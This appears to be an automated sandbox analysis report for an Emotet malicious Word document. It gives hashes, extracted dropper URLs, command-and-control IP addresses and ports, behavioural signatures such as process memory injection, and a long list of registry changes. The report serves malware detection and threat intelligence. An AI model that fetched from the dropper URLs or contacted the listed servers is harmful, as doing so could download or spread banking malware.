emotet | fcad2a97c97b92310e8c88ae7aa71452923bc3c8e67d4be4d12b5b93320432ae

Analysis

max time kernel
21s
max time network
20s
platform
windows7_x64
resource
win7v200722
submitted
31-07-2020 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fcad2a97c97b92310e8c88ae7aa71452923bc3c8e67d4be4d12b5b93320432ae.doc
Size

168KB
MD5

19d28177f751a82727b953ead1233de1
SHA1

3e0d77ed9978c582ad1b3bdb5aa1213638b27abe
SHA256

fcad2a97c97b92310e8c88ae7aa71452923bc3c8e67d4be4d12b5b93320432ae
SHA512

1951217d0e1d967f1e77f0145c3a08cbbf483298e79f2ee8b6b6a4db2d18d208bd4e7b84d08c7e541a1a49fbfb3cc881991cbd9e1cf23803ddb865d0bef4acaf

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://artexproductions.com/cgi-bin/xHdbmk/

exe.dropper

http://whistledownfarm.com/cgi-bin/tlsjw81/

exe.dropper

http://e-motiva.com/wp-admin/bFr531220/

exe.dropper

http://stolkie.net/m/H0LV59574/

exe.dropper

http://www.faccomputer.com/images/5mMAg7bKKK/

Extracted

Family

emotet

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe
File opened for modification	C:\Windows\SysWOW64\WinSCard\cmstplua.exe	273.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1420	WINWORD.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1420	WINWORD.EXE
1420	WINWORD.EXE
1880	273.exe
1604	cmstplua.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1528	powersheLL.exe
1528	powersheLL.exe
1604	cmstplua.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1880 wrote to memory of 1604	1880	273.exe	29
PID 1880 wrote to memory of 1604	1880	273.exe	29
PID 1880 wrote to memory of 1604	1880	273.exe	29
PID 1880 wrote to memory of 1604	1880	273.exe	29

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

resource	yara_rule
behavioral1/memory/1880-11-0x0000000000260000-0x000000000026C000-memory.dmp	emotet
behavioral1/memory/1880-11-0x0000000000260000-0x000000000026C000-memory.dmp	emotet
behavioral1/memory/1604-14-0x0000000000200000-0x000000000020C000-memory.dmp	emotet
behavioral1/memory/1604-14-0x0000000000200000-0x000000000020C000-memory.dmp	emotet

Modifies registry class 280 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\0\win32	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
